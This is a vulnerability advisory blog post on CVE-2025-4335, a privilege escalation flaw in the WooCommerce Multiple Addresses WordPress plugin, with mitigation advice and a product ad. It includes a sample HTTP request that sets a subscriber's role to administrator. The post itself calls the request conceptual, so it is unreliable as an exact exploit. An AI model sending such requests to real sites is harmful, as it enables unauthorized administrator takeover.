Ameeba Chat App store presentation
Download Ameeba Chat Today
Ameeba Blog Search

CVE-2025-4335: Privilege Escalation Vulnerability in Woocommerce Multiple Addresses Plugin for WordPress

Ameeba’s Mission: Safeguarding privacy by securing data and communication with our patented anonymization technology.

Overview

The focus of this blog post is the recently identified vulnerability, CVE-2025-4335, that plagues the Woocommerce Multiple Addresses plugin for WordPress. This flaw can lead to privilege escalation, allowing attackers to gain unauthorized access to higher levels of the system. The vulnerability specifically affects all versions of the plugin up to and including 1.0.7.1. Given the widespread use of WordPress and the popularity of Woocommerce plugins, this vulnerability presents a significant risk to website owners and their users, potentially leading to system compromise or data leakage.

Vulnerability Summary

CVE ID: CVE-2025-4335
Severity: High (CVSS 8.8)
Attack Vector: Network
Privileges Required: Low (Subscriber-level Access)
User Interaction: Required
Impact: System compromise and potential data leakage

Affected Products

Escape the Surveillance Era

You just read how systems get breached.
What most apps won’t tell you is — they’re part of the problem.

Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.

Ameeba Chat gives you a way out.

  • • No phone number
  • • No email
  • • No personal info
  • • Anonymous aliases
  • • End-to-end encrypted

Chat without a trace.

Product | Affected Versions

Woocommerce Multiple Addresses Plugin for WordPress | All versions up to and including 1.0.7.1

How the Exploit Works

This exploit hinges on the insufficient restrictions placed on user meta that can be updated through the save_multiple_shipping_addresses() function in the Woocommerce Multiple Addresses plugin. As a result, an authenticated attacker with Subscriber-level access or above can manipulate these meta to elevate their privileges to administrator level. This exploit does require user interaction, as the attacker must be authenticated and must actively manipulate the user meta.

Conceptual Example Code

Below is a conceptual example of how an attacker might exploit this vulnerability:

POST /wp-admin/admin-ajax.php?action=woocommerce_save_multiple_shipping_addresses HTTP/1.1
Host: target.example.com
Content-Type: application/json
{
"user_id": "target_user_id",
"shipping_addresses": [
{
"first_name": "Attacker",
"last_name": "Attacker",
"company": "",
"address_1": "123 Malicious St",
"address_2": "",
"city": "Malicious",
"state": "MS",
"postcode": "12345",
"country": "US",
"role": "administrator"
}
]
}

In this example, the attacker is attempting to change their role from a subscriber to an administrator through the save_multiple_shipping_addresses() function.

Mitigation Guidance

To mitigate this vulnerability, users are advised to apply the vendor patch as soon as it becomes available. In the interim, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation. Regularly updating and patching software is crucial in any cybersecurity strategy, and this vulnerability underscores its importance.

Ameeba Chat icon
Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.